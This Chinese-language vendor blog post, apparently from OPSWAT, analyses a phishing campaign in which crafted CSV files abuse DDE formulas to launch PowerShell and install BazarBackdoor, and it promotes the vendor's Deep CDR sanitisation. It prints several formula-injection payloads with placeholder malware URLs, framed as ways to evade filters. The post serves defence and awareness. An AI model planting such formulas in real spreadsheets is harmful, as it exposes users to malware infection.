2022年2月,恶意软件研究员克里斯·坎贝尔(Chris Campbell)发现了一起新型网络钓鱼攻击活动,该活动利用经过特殊设计的CSV(逗号分隔值)文本文件,将BazarBackdoor木马植入用户设备。在本篇博客中,我们将分析该攻击场景,并向您展示如何利用Deep CDR™技术(内容解除武装与重建)来防范这种复杂的攻击。
攻击战术
在这次网络钓鱼活动中,网络罪犯利用了 CSV 文件--一种以表格格式存储数据并使用逗号分隔值的分隔文本文件。这种文件类型是数据库和应用程序之间交换简单数据的常用方式。由于 CSV 文件只包含文本,没有可执行代码,因此很多用户认为它是无害的,并不加警惕地迅速打开文档。他们没有想到,如果使用支持动态数据交换(DDE)的应用程序(如 Microsoft Excel 和 OpenOffice Calc)打开 CSV 文件,该文件可能会成为恶意软件侵入其设备的威胁载体。这些应用程序可以执行 CSV 文件中的公式和函数。威胁制造者滥用这种 DDE 功能来执行任意命令,下载并安装 BazarBackdoor 木马,从而入侵并完全访问不知情的受害者设备上的企业网络。与隐藏在 MS Office 文件中的恶意宏或 VBA 代码的流行攻击方式相比,隐藏在 DDE 文件中的威胁更难被发现。
仔细查看该文件,我们可以发现其中一列数据中包含一个 =WmiC| 命令(Windows 管理接口命令)。如果受害者无意中允许这个 DDE 函数运行,它就会创建一个 PowerShell 命令。然后,该命令将打开一个远程 URL 以下载 BazarLoader,BazarBackdoor 将被安装到受害者的机器上。
How Deep CDR™ 技术如何帮助您防御 DDE 攻击
您可以通过在电子邮件附件触达用户之前对其进行净化处理,从而保护您的网络免受这些复杂的网络钓鱼攻击。Deep CDR™ 技术秉持“每个文件都可能构成潜在威胁”的理念,并侧重于预防而非仅限于检测,在保持文件可用性和功能不变的同时,将文件中的所有活动内容彻底清除。 Deep CDR™ 技术是MetaDefender OPSWAT高级威胁防御平台MetaDefender 六大核心技术之一,该平台真正贯彻了零信任理念。
以下是我们使用MetaDefender Core 处理受感染的 CSV 文件后的清理详情Core 您也可以参考MetaDefender Cloud 上的扫描结果)。Deep CDR™ 技术已中和了文件中的公式,因此未生成任何 PowerShell 命令。该恶意软件因此无法被下载。
在类似的攻击中,威胁作者使用更复杂的公式来逃避检测。通常,MS Excel 中的公式以等号 (=) 开头。但是,由于该应用程序也接受以不同符号(如"=+"或"@")开头的公式,而不是仅以"="开头,因此 CSV 文件中的破坏性公式可以是:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
此类公式可能会逃过某些常见的CDR系统的检测。然而,Deep CDR™ 技术能够轻松应对这种手段,并生成干净、安全无害的文件,从而消除威胁。
了解有关Deep CDR™ 技术的更多信息,或咨询OPSWAT 专家,探索最佳安全解决方案,以保护您的企业网络和用户免受零日攻击及高级隐蔽型恶意软件的侵害。
